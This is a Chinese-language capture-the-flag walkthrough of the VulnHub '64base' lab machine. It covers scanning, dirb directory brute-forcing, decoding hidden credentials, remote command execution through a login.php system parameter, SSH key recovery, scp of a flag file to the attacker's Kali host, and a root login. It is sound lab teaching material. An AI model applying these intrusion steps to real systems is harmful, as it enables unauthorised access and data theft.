vulnhub靶场实战-64base
扫描获取iparp-scan -lnetdiscover -r 10.0.2.0/24nmap 10.0.2.0/2412254结尾的一般是网段所以尝试直接访问10.0.2.3发现成功进入下一步进行深度扫一下看看是否有什么遗漏如果直接nmap 10.0.2.3的话也就只扫描1000个左右的端口所以使用nmap -sT -T4 -p- 10.0.2.3-sT表示tcp扫描-T4表示时间速度为4-p-表示全端口扫描在页面上浏览的过程中发现最下面两行小字所以现在所收集到的信息为主机ip10.0.2.3可使用端口22/tcp open ssh80/tcp open http4899/tcp open radmin62964/tcp open unknown网页信息dmlldyBzb3VyY2UgO0QKOnly respond if you are a real Imperial-Class BountyHunterflag1网页一直显示64base搜一下看看是什么发现是一种编码那后面跟的字符串很有可能就是某些编码进行解码发现为view source ;D发现让看源码页面源码中发现一长串字符记录5a6d78685a7a4637546d705361566c59546d785062464a7654587056656c464953587055616b4a56576b644752574e7151586853534842575555684b6246524551586454656b5a77596d316a4d454e6e5054313943673d3d0a从中可看到全是123456这种数字最大的是e那么大概率就是16进制了。先进行16进制解码获取到ZmxhZzF7TmpSaVlYTmxPbFJvTXpVelFISXpUakJVWkdGRWNqQXhSSHBWUUhKbFREQXdTekZwYm1jMENnPT19Cg最后1个或者2个的便是base64编码了则再进行base64解码得到第一个flagflag1{NjRiYXNlOlRoMzUzQHIzTjBUZGFEcjAxRHpVQHJlTDAwSzFpbmc0Cg}flag2对于flag1的内容看着明显也是64编码解码得64base:Th353r3N0TdaDr01DzUreL00K1ing4解码后的内容像是用户名密码既然有用户名密码那么就有登陆的网站如何寻找登陆的网站需要使用目录爆破了dirb http://10.0.2.3先查看code200可正常访问的dirb http://10.0.2.3 | grep CODE:200扫描到很多东西一个一个打开查看其实很多是陷阱后面的php和html文件没什么参考性了查看到http://10.0.2.3/robots.txt时发现有很多内容但是不知道看哪些换个思路查看code401需要授权访问的dirb http://10.0.2.3 | grep CODE:401有一个admin页面访问进去需要输入用户名密码但是将前面看着像是用户名密码的输入进去后发现登陆不上那么还是只能回到原先的robots.txt文件中里面的内容也都可以访问但是数量太多一个一个试太费时间。直接使用dirb会用默认字典现在可以将robots.txt文件里的内容转化为一个字典再进行dirb就可以自动访问了。先将页面内容下载下来为base64.out文件wget http://10.0.2.3 -rq -O base64.out再将其内容变为字典html2dic base64.out|sort -u base64.dict可使用wc -l base64.dict稍微看一下一共多少条数据借助字典进行dirb http://10.0.2.3 base64.dict| grep CODE:401发现多了一个访问一下http://10.0.2.3/Imperial-Class/输入用户名密码后发现路径错误。提示前往黑暗面。前面仔细阅读网页内容的话会发现出现了很多Dark Side。往下看到一张黑色的图片看到图片下方的一句话Only respond if you are a real Imperial-Class BountyHunter时突然想起刚才所得路径就是Imperial-Class。那么访问http://10.0.2.3/Imperial-Class/BountyHunter/再登陆没反应。但是如果细心一点可以发现url多了一个php文件看一下源码发现3串长字符串现在看到就想到16进制了都拿进去解码一下解码后又是一个base64编码再解码得到flag2flag3一看到flag2后的内容就还是base64编码再进行解码试试访问网站看完视频到最后出现这样一行字当看到burp的时候就想起bp了那么就bp抓一下试试打开Linux中的bp还是在登陆网站输入账户密码进行抓包抓包后发送到重发器发送一下看到响应中有flag3flag3{NTNjcjN0NWgzNzcvSW1wZXJpYWwtQ2xhc3MvQm91bnR5SHVudGVyL2xvZ2luLnBocD9mPWV4ZWMmYz1pZAo}flag4对flag3进行base64解码53cr3t5h377/Imperial-Class/BountyHunter/login.php?fexeccid访问一下啥也没有。看到后面exec想到rec远程命令执行漏洞c为命令行执行。即使后面讲id修改为pwd什么的也还是没反应这时候没思路了。因为有了前面那一行小字的提醒再次去那地方看发现上面一行黄字IMPORTANT!!! USE SYSTEM INSTEAD OF EXEC TO RUN THE SECRET 5H377那么修改exec访问http://10.0.2.3/Imperial-Class/BountyHunter/login.php?fsystemcid发现flag4以及下面这些内容记录Debian GNU/Linux 8 \n \lSat Jul 25 08:57:28 BST 2026Linux 64base 3.16.0-4-586 #1 Debian 3.16.36-1deb8u2 (2016-10-19) i686 GNU/Linuxinet addr:10.0.2.3 Bcast:10.0.2.255 Mask:255.255.255.0inet6 addr: fe80::a00:27ff:fe68:e7f8/64 Scope:Linkuid1001(64base) gid1001(64base) groups1001(64base)flag5flag4{NjRiYXNlOjY0YmFzZTVoMzc3Cg}再次解码又获得了账户密码64base:64base5h377试试登陆admin登陆不上。那剩ssh登陆了ssh 64base10.0.2.3 。发现端口关闭这时候根据前面获取的端口依次尝试4899和62964ssh 64base10.0.2.3 -p 4899ssh 64base10.0.2.3 -p 62964输入密码尝试64base5h377时一直不对对密码进行64base编码试一下得到NjRiYXNlNWgzNzc试试发现密码也不对。那试试kali linux进行编码echo 64base5h377 | base64得到NjRiYXNlNWgzNzcK再尝试进行登陆发现进去了进入后查看都有哪些文件发现一个well_done,看一下具体内容但是每次cat时就出现一个小人正常来说cat是来查看文件内容的但是这里不对而且很多命令也无法正常执行说明应该是环境进行了相关的设置。但是env和echo可以使用查看一下环境变量echo $PATH/*发现里面有个base64那试一下用base64环境跑一下base64 well_done_:D对其进行解码base64 well_done_:D | base64 --decode说是让获取root在看一下环境发现里面有个droids试一下但是好像也没啥用ctrlc退出。再重新看下环境echo $PATH/*准备试试其他的执行后发现和之前执行的结果不一样了而且id等命令也可以执行了。这时候说明已经进入到此网站的后台了。那么去看下之前停留的页面的源代码有什么东西输入cd /var/www/后面的/var/www/为一般的网站目录。进入后发现一个html文件进入看一下发现很多文件。可以依次都试试比如back为备份文件。但现在看到里面有admin进去看一下发现有两个文件再查看一下这两个文件file S3cR37发现又是一个目录php文件看不了。那就进去S3cR37看一下发现flag5。flag5{TG9vayBJbnNpZGUhIDpECg}。flag6对于flag5也可以使用find命令这里存在一个问题靶机中的find路径被作者修改为/var/alt-bin/find展示ascll图并非标准find我们应该使用/usr/bin/find /var -name flag*解码后得到看里面。file一下发现其为一个jpg的图片既然是图片那么就得看看长什么样。但是catheadtail命令都被修改看不了。head的一般完整路径为/usr/bin/head使用一下发现有可能被执行那使用strings转换为字符串看一下那么先转换再查看发现可以strings flag5{TG9vayBJbnNpZGUhIDpECg} | /usr/bin/tailstrings flag5{TG9vayBJbnNpZGUhIDpECg} | /usr/bin/head其实可以看到前面很长一大段字符串看着很像16进制解码发现结果最后也有进行一下base64解码结果显示一份密钥文件也可使用linux中的解码一样可以获取echo 4c530744.......f3d0a | xxd -r -p | base64 -d先将其保存为一个文件echo 4c53307....516f3d0a | xxd -r -p | base64 -d /tmp/ssh.keytmp文件所有用户都有写入权限有了密钥后就可以开始尝试登陆root用户了ssh root10.0.2.3 -p 62964 -i ssh.key发现有问题。一般使用密钥文件时需要权限使用chmod 600 ssh.key添加再次访问ssh root10.0.2.3 -p 62964 -i ssh.key发现需要密码但是密码不知道。回到之前的看file flag5时发现是一张图片但是前面只看了文件内容具体长的样子不知道先看一下。使用scp flag* root10.0.2.15:/tmp/flag5.jpg传入到kali中去kali自身的ssh服务要开启service ssh start 但是发现自己密码不对那不使用root了换成kaliscp ./flag* kali10.0.2.15:/tmp/flag5.jpg可以进入。去tmp文件夹看一下图片样子。看到usetheforce这一串字符是不是密码呢试一下访问ssh -p 62964 root10.0.2.3 -i /tmp/ssh.key并输入usetheforce还真进去了得到flag6flag7很明显对flag6的内容进行base64解码再进行16进制解码再进行64解码再进行16进制解码再进行64解码得到base64 -d /var/local/.luke|less.real然后访问一下得到结束

相关新闻

谁懂[特殊字符]论文格式调了一整晚,还是全错

谁懂[特殊字符]论文格式调了一整晚,还是全错

写论文最消磨耐心的,根本不是写内容! 是没完没了的格式排版。 内容改得再完美,导师一看:页眉错、目录乱、参考文献不规范、行距不对。 通宵对着学校模板一点点对,改完一页乱一页,通篇细碎小问题不断&…

2026/7/31 14:22:21 阅读更多 →
STM32串口动态调整PWM频率占空比:电机控制与LED调光实战

STM32串口动态调整PWM频率占空比:电机控制与LED调光实战

1. 项目概述:一个动态可调的PWM信号发生器 在嵌入式开发,尤其是电机控制、LED调光、舵机驱动这些场景里,PWM(脉冲宽度调制)信号是再基础不过的“硬通货”。但很多时候,我们需要的不是一个固定不变的PWM&…

2026/7/31 14:22:16 阅读更多 →
Unity绿幕抠像实战:Chroma Key Kit 2.3插件实现电影级虚实融合

Unity绿幕抠像实战:Chroma Key Kit 2.3插件实现电影级虚实融合

1. 项目概述:当虚拟与现实在Unity中无缝交融 在游戏开发、虚拟制片、在线直播乃至教育培训领域,一个长久以来的核心需求是如何将真实世界的人物或物体,自然地“放置”到由计算机生成的虚拟场景中。传统的方案要么成本高昂,要么效果…

2026/7/31 14:22:11 阅读更多 →

最新新闻

从零开始:国光的终极OpenCore黑苹果完整安装指南

从零开始:国光的终极OpenCore黑苹果完整安装指南

从零开始:国光的终极OpenCore黑苹果完整安装指南 【免费下载链接】Hackintosh 国光的黑苹果安装教程:手把手教你配置 OpenCore 项目地址: https://gitcode.com/gh_mirrors/hac/Hackintosh 在普通PC上安装macOS系统,让非苹果硬件也能体…

2026/7/31 15:13:00 阅读更多 →
5分钟完全掌握RyzenAdj:释放AMD Ryzen处理器隐藏性能的终极指南

5分钟完全掌握RyzenAdj:释放AMD Ryzen处理器隐藏性能的终极指南

5分钟完全掌握RyzenAdj:释放AMD Ryzen处理器隐藏性能的终极指南 【免费下载链接】RyzenAdj Adjust power management settings for Ryzen APUs 项目地址: https://gitcode.com/gh_mirrors/ry/RyzenAdj RyzenAdj是一款开源免费的AMD Ryzen处理器功耗管理工具&…

2026/7/31 15:13:00 阅读更多 →
QQ音乐QMC解密终极指南:3分钟快速解锁加密音乐文件

QQ音乐QMC解密终极指南:3分钟快速解锁加密音乐文件

QQ音乐QMC解密终极指南:3分钟快速解锁加密音乐文件 【免费下载链接】qmc-decoder Fastest & best convert qmc 2 mp3 | flac tools 项目地址: https://gitcode.com/gh_mirrors/qm/qmc-decoder 还在为QQ音乐下载的歌曲只能在特定播放器播放而烦恼吗&#…

2026/7/31 15:13:00 阅读更多 →
三维A星算法在无人机路径规划中的实现与优化

三维A星算法在无人机路径规划中的实现与优化

1. 项目概述:当无人机遇上A星算法 去年调试四旋翼无人机时,我在复杂城区环境遇到了路径规划的难题。传统人工示教路径在动态障碍物面前束手无策,直到尝试将A星算法(A* Algorithm)引入三维空间,才真正实现了…

2026/7/31 15:13:00 阅读更多 →
STM32驱动雨滴传感器:从ADC采集到RTOS任务的全流程解析

STM32驱动雨滴传感器:从ADC采集到RTOS任务的全流程解析

1. 从“下雨了吗?”到“雨有多大?”:雨滴传感器的核心价值 最近在整理工作室的旧项目,翻出来一个落灰的雨滴传感器模块和一块STM32F103的开发板。这让我想起几年前第一次接触这个传感器时,脑子里冒出的第一个问题&…

2026/7/31 15:13:00 阅读更多 →
面向先进封装与3C微组装:TGS-XY三轨直驱精密XY平台的精度与空间协同技术

面向先进封装与3C微组装:TGS-XY三轨直驱精密XY平台的精度与空间协同技术

在3C电子与半导体制造领域,设备对空间利用率与运动精度的要求已逼近物理极限。微型化封装、纳米级对位、无尘洁净环境下的高速定位,成为产线升级的核心挑战。雅科贝思TGS-XY模组,正是为应对这一系列严苛需求而生的精密运动平台。该模组采用‌…

2026/7/31 15:12:00 阅读更多 →

日新闻

物理复制比逻辑复制好在哪?数据库复制原理详解

物理复制比逻辑复制好在哪?数据库复制原理详解

数据库复制是把主库数据同步到备库的机制,分为逻辑复制和物理复制两种。逻辑复制传输的是 SQL 语句或行变更事件,物理复制传输的是存储引擎底层的物理日志。阿里云 PolarDB(云原生数据库)采用物理复制,在同步延迟、数据…

2026/7/31 0:00:34 阅读更多 →
BilibiliDown:3分钟学会B站视频下载的终极指南

BilibiliDown:3分钟学会B站视频下载的终极指南

BilibiliDown:3分钟学会B站视频下载的终极指南 【免费下载链接】BilibiliDown (GUI-多平台支持) B站 哔哩哔哩 视频下载器。支持稍后再看、收藏夹、UP主视频批量下载|Bilibili Video Downloader 😳 项目地址: https://gitcode.com/gh_mirrors/bi/Bilib…

2026/7/31 0:00:34 阅读更多 →
有哪些游戏数据AI平台?游戏行业Data+AI融合方案盘点

有哪些游戏数据AI平台?游戏行业Data+AI融合方案盘点

当前,游戏行业的“DataAI融合”已从概念验证进入价值落地阶段。根据IDC 2025年数据,中国AI游戏云市场规模已达18.6亿元;同时,游戏研发环节AI渗透率高达86%,生成式AI内容普及率超过50%。面对庞大的市场,游戏…

2026/7/31 0:00:34 阅读更多 →

周新闻

深度学习道路桥梁裂缝检测系统 道路桥梁裂缝检测数据集 道路桥梁病害识别检测数据集

深度学习道路桥梁裂缝检测系统 道路桥梁裂缝检测数据集 道路桥梁病害识别检测数据集

深度学习道路桥梁裂缝检测系统 数据集6000张 完整源码已标注数据集训练好的模型环境配置教程程序运行说明文档,可以直接使用!系统支持图片、视频、摄像头等多种方式检测裂缝,功能强大实用。 1数据集6000张 8各类别

2026/7/31 1:03:03 阅读更多 →
深度学习YOLO模型如何训练 PUBG 绝地求生目标检测数据集

深度学习YOLO模型如何训练 PUBG 绝地求生目标检测数据集

pubg数据集 精选原图1.42万数据 1.49万标签 无任何重复、算法增强或冗余图像! pubg绝地求生目标检测数据集 1分类:e_body,14905个标签,txt格式 共计14244张图,99%为640*640尺寸图像 适合yolo目标检测、AI训练关键词&am…

2026/7/29 14:34:28 阅读更多 →
Apex英雄目标检测数据集 深度学习框架YOLO如何训练APEX数据集

Apex英雄目标检测数据集 深度学习框架YOLO如何训练APEX数据集

Apex检测数据集数据集详情检测类别: allies enemy tag图片总量:7247张训练集:5139张验证集:1425张测试集:683张标注状态:全部已标注,即拿即用数据格式:支持YOLO格式及其他格式&#…

2026/7/31 4:19:39 阅读更多 →

月新闻